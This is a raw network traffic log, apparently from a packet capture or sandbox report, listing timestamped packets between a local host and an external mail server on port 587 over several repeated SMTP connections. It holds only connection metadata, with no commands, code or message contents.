Oct 1, 2024 06:18:35.531393051 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.531656027 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:35.536520958 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.739002943 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.739352942 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:35.744184971 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.937848091 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:35.938070059 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:35.942859888 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.102813005 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.103368044 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.109046936 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.281692028 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.285762072 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.290553093 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.444133997 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.444737911 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.444737911 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.444792986 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.444869041 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.449698925 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.449713945 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.449750900 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.681418896 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.685616016 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.690460920 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.852005959 CEST	587	50456	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.852838039 CEST	50456	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.855689049 CEST	50457	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:36.860655069 CEST	587	50457	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:36.860739946 CEST	50457	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:37.192003012 CEST	50457	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:37.193361044 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:37.197058916 CEST	587	50457	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:37.197139025 CEST	50457	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:37.198220015 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:37.198276997 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:37.770266056 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:37.770390987 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:37.775327921 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:37.933619022 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:37.933747053 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:37.938568115 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.100075960 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.104047060 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:38.108808041 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.294903994 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.294917107 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.294934034 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.294941902 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.295013905 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:38.295013905 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:38.385391951 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.386610985 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:38.391371965 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.560220957 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.567832947 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:38.572633028 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.732070923 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.732901096 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:38.737636089 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.897320986 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:38.897644043 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:38.902410030 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.075634956 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.075862885 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.080748081 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.239419937 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.239603043 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.244447947 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.429301023 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.429454088 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.434259892 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.593722105 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.594024897 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.594095945 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.594115973 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.594141960 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.598903894 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.598913908 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.599102974 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.599153042 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.833923101 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.834516048 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.839442968 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.998573065 CEST	587	50458	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:39.998976946 CEST	50458	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:39.999771118 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:40.004676104 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:40.004745960 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:40.578175068 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:40.582283974 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:40.587188959 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:40.746006012 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:40.749789953 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:40.754651070 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:40.914518118 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:40.915129900 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:40.919909000 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.092952013 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.092972040 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.092992067 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.092999935 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.093027115 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:41.093055964 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:41.183454990 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.185235023 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:41.190036058 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.348875999 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.349889040 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:41.354717016 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.513345957 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.513519049 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:41.518260956 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.708406925 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.708668947 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:41.713490963 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.888869047 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:41.889004946 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:41.893769026 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.056900978 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.057765007 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.062571049 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.242651939 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.245728970 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.250549078 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.409742117 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.410212040 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.410212040 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.410253048 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.410253048 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.415133953 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.415143967 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.415170908 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.415175915 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.646612883 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.647638083 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.652462959 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.812766075 CEST	587	50459	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.817940950 CEST	50459	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.820632935 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:42.825447083 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:42.829736948 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:43.402789116 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:43.402926922 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:43.407723904 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:43.567401886 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:43.567533970 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:43.572392941 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:43.889168978 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:43.889524937 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:43.894362926 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.088779926 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.088793993 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.088810921 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.088819981 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.097631931 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:44.179296970 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.183654070 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:44.188431025 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.348203897 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.354451895 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:44.359245062 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.518423080 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.518790960 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:44.523555040 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.687572002 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.688954115 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:44.693770885 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.879861116 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:44.880909920 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:44.885731936 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.045223951 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.047732115 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:45.052539110 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.226370096 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.226589918 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:45.231475115 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.390290976 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.390697002 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:45.390731096 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:45.390754938 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:45.390772104 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:45.395647049 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.395659924 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.395699024 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.638273954 CEST	587	50460	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.639978886 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:45.645761967 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:45.645845890 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:45.691906929 CEST	50460	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:50.472876072 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.475761890 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:50.480595112 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.637662888 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.641761065 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:50.646632910 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.808094025 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.809940100 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:50.814821959 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.994889021 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.994896889 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.994903088 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.994911909 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.994918108 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:50.995021105 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:51.085403919 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.085453987 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:51.087557077 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:51.092322111 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.263190031 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.264141083 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:51.268923998 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.426510096 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.426681042 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:51.431572914 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.588911057 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.589174032 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:51.593986988 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.773607016 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.773781061 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:51.778559923 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.935844898 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:51.936034918 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:51.940901995 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.123739958 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.129537106 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:52.134974957 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.311810970 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.312149048 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:52.312149048 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:52.312251091 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:52.312341928 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:52.317033052 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.317039013 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.317121029 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.317178011 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.565113068 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.565860033 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:52.570730925 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.729523897 CEST	587	50461	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.732141972 CEST	50461	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:52.734909058 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:52.739753962 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:52.740000963 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:53.310276985 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.310436964 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:53.315304995 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.472721100 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.472882986 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:53.477694035 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.637108088 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.637634039 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:53.642446041 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.822350025 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.822355986 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.822360992 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.822441101 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:53.827552080 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.827588081 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.827620029 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:53.829076052 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:53.833903074 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.995184898 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:53.996917009 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:54.002094984 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.168817043 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.175899982 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:54.180901051 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.338617086 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.339274883 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:54.344168901 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.517362118 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.519844055 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:54.524708986 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.684134960 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.688087940 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:54.692929983 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.888436079 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:54.892352104 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:54.897166967 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:55.059010029 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:55.059947968 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:55.059947968 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:55.060039997 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:55.060039997 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:55.064795017 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:55.064913034 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:55.295295954 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:55.296025991 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:55.300872087 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:55.462593079 CEST	587	50462	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:55.463161945 CEST	50462	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:55.464142084 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:55.468924999 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:55.468980074 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:56.023166895 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.023293972 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:56.028083086 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.188596010 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.193660021 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:56.198648930 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.355374098 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.358830929 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:56.363610983 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.575965881 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.575979948 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.576086998 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.576093912 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.576172113 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:56.660615921 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.662051916 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:56.667027950 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.822191954 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.825656891 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:56.830440044 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.987646103 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:56.989859104 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:56.994630098 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.167670012 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.167989969 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:57.172774076 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.347908974 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.348192930 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:57.352979898 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.520653963 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.520822048 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:57.525559902 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.692842960 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.692990065 CEST	50463	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:18:57.697923899 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.857589006 CEST	587	50463	198.54.114.247	192.168.2.4
Oct 1, 2024 06:18:57.857903004 CEST	50463	587	192.168.2.4	198.54.114.247
